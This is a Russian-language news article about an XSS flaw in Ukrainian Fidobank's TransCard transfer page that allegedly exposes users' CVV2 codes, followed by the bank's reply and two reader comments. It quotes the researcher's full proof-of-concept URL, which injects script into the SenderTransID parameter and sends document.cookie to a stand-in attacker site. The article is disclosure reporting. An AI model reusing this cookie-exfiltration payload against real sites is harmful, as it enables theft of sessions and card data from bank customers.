Обнаружена уязвимость, которая позволяет украсть CVV2-код пользователя «Фидобанка»
В сервисе мгновенного перевода средств с карты на карту украинского банка «Фидобанк» обнаружилась уязвимость, с помощью которой злоумышленники могут узнать CVV2-код пользователя через интернет. Этот код очень важен — зная его, намного проще взломать счет и получить доступ к денежным средствам. Уязвимость обнаружил пользователь «Хабра» под ником dinikin, который ранее находил бреши и скрытые возможности в онлайн-сервисах «Альфа-банка». В «Фидобанке» говорят, что уязвимость не критична, но в течение суток обещают улучшить безопасность системы.
При помощи XSS-уязвимости злоумышленник, зная номер карты человека, который недавно делал денежный перевод через сервис «Фидобанка» TransCard, может получить CVV2-код его карты. Чтобы обеспечить себе полный доступ к счету, мошеннику останется лишь подобрать срок действия карты, а это всего два параметра — месяц и год.
Уязвимость была обнаружена в процессе пересылки средств с карты на карту через p2p-сервис «Фидобанка». «После осуществления платежа меня переадресовало на страницу вида pay.fidobank.ua/TransCard/pay?SenderTransID=TS1421332314712. Я решил проверить, фильтруется ли значение параметра SenderTransID, которое выводилось на странице. Естественно, оно не фильтровалось и давало возможность эксплуатации XSS-уязвимости. Я составил url, при переходе на который все куки отправлялись на фейковый псевдозловредный сайт someveryverydangeroussite.com. URL выглядел следующим образом:
https://pay.fidobank.ua/TransCard/pay?SenderTransID=<form method=get name=a action=https://someveryverydangeroussite.com><input name=b></form><script>document.a.b.value=document.cookie;alert(document.a.b.value);document.a.submit();</script>
Переход по этой ссылке показывал следующее сообщение:
Все бы ничего, если бы разработчики еще больше на облегчили работу по эксплуатации уязвимости, сохраняя cvv2 код в поле для его ввода даже после проведения платежа», — пишет dinikin.
По его мнению, из-за подобной уязвимости «Фидобанк» не смог бы пройти PCI DSS-сертификацию (стандарт безопасности данных индустрии платежных карт). «Хранить CVV2 каким-либо образом на сервере строго запрещено платежными системами Visa и MasterCard», — пояснил он. Впрочем, в комментариях пользователи «Хабра» пишут, что CVV не обязательно хранится на сервере, возможны и другие варианты, например, localStorage или в самой сессии.
Об обнаруженной уязвимости пользователь якобы сообщил в банк еще две недели назад, однако, судя по комментариям сотрудников «Фидобанка» в Facebook, ее до сих пор не устранили. «Пока можно пользоваться сервисом переводов с #FidoWallet, там все в порядке», — написал в обсуждении эксперт в сфере мобильного банкинга Сергей Скабелин. По его словам, сейчас на устранение уязвимости в банке брошены все силы. Этот факт косвенно может подтверждаться тем, что сервис TransCard периодически работает нестабильно.
В «Фидобанке» на запрос AIN.UA ответили, что банк уже провел анализ полученной информации об уязвимости. «В результате проверки было определено, что критичные данные клиента, в частности CVV2-код, не хранятся на ресурсе, следовательно, кража информации о CVV2 невозможна, — говорится в сообщении пресс-службы. — Мы благодарим клиента, обратившего наше внимание на этот аспект работы системы. В течение 24 часов в рамках обновления будет улучшена в том числе и безопасность сервиса онлайн-переводов».
Напомним, «Фидобанк» учредил Александр Адарич, позиционируя финучреждение как исключительно инновационную компанию, которая предлагает самые современные платежные и расчетные инструменты.
Комментарии | 2
Говно сделали, как говно работало, как говно отмазываются. Не безпричинно я не доверяю подобным фин. системам. Если это не компании США. 🙂
Я могу быть резок, и не прав, но таково мое мнение. Извините за грубость если чо!